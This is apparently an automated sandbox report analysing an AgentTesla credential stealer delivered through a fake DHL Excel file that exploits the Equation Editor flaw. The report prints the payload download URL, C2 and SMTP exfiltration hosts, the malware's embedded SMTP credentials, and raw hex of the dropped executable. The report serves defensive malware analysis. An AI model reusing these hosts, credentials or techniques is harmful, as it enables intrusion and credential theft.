Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report DHL-Address.xlsx

Overview

General Information

Sample Name:DHL-Address.xlsx
Analysis ID:339078
MD5:5de2e8bdb620804fd22d76f1e9fedf6e
SHA1:942ce29cd8138a1594ee416debf753d8eaa71528
SHA256:f5c3bea5b81c221bc8737bd8489154745c8d6644d7d19484218151f9a1c1f656
Tags:xlsx

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1616 cmdline: 'C:\Users\Public\vbc.exe' MD5: B232B5C7754D932B07C0D47F934EFBFE)
      • vbc.exe (PID: 552 cmdline: C:\Users\Public\vbc.exe MD5: B232B5C7754D932B07C0D47F934EFBFE)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "lhYwFYIE", "URL: ": "https://jUxNbkiTmoSYxyvoDh.net", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "KY7mWKFAl", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.210.214.178, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
              Sigma detected: Executables Started in Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
              Sigma detected: Execution in Non-Executable FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
              Sigma detected: Suspicious Program Location Process StartsShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: http://globuserinessserverfiletransferprotocol.mangospot.net/csrss/vbc.exeAvira URL Cloud: Label: malware
              Found malware configurationShow sources
              Source: vbc.exe.552.5.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "lhYwFYIE", "URL: ": "https://jUxNbkiTmoSYxyvoDh.net", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "KY7mWKFAl", "From: ": ""}
              Multi AV Scanner detection for submitted fileShow sources
              Source: DHL-Address.xlsxVirustotal: Detection: 47%Perma Link
              Source: DHL-Address.xlsxReversingLabs: Detection: 48%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
              Machine Learning detection for sampleShow sources
              Source: DHL-Address.xlsxJoe Sandbox ML: detected

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_007415D0
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_007415C0
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 00741064h4_2_00740FE4
              Source: global trafficDNS query: name: globuserinessserverfiletransferprotocol.mangospot.net
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.214.178:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.214.178:80

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://jUxNbkiTmoSYxyvoDh.net
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 199.193.7.228:587
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 12:17:21 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 13 Jan 2021 09:01:13 GMTETag: "ce000-5b8c461903ba5"Accept-Ranges: bytesContent-Length: 843776Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d9 b6 fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d6 0c 00 00 08 00 00 00 00 00 00 3e f4 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f3 0c 00 4f 00 00 00 00 00 0d 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 d4 0c 00 00 20 00 00 00 d6 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 05 00 00 00 00 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 f4 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 3c 58 01 00 d8 a0 01 00 03 00 00 00 19 01 00 06 14 f9 02 00 d8 fa 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1e 00 00 0a 2a 26 00 02 28 1f 00 00 0a 00 2a ce 73 20 00 00 0a 80 01 00 00 04 73 21 00 00 0a 80 02 00 00 04 73 22 00 00 0a 80 03 00 00 04 73 23 00 00 0a 80 04 00 00 04 73 24 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 26 00 02 28 2a 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2b 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2c 00 00 0a 6f 2d 00 00 0a 73 2e 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a
              Source: Joe Sandbox ViewIP Address: 199.193.7.228 199.193.7.228
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 199.193.7.228:587
              Source: global trafficHTTP traffic detected: GET /csrss/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globuserinessserverfiletransferprotocol.mangospot.netConnection: Keep-Alive
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B636490.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /csrss/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globuserinessserverfiletransferprotocol.mangospot.netConnection: Keep-Alive
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: globuserinessserverfiletransferprotocol.mangospot.net
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://MLrjrg.com
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: vbc.exe, 00000005.00000002.2359948941.000000000081D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: vbc.exe, 00000005.00000003.2357949309.0000000005158000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2359901613.00000000007AD000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.2359948941.000000000081D000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
              Source: vbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: vbc.exe, 00000005.00000002.2363028590.0000000006E50000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
              Source: vbc.exe, 00000005.00000002.2360554779.0000000002658000.00000004.00000001.sdmpString found in binary or memory: http://smtp.privateemail.com
              Source: vbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
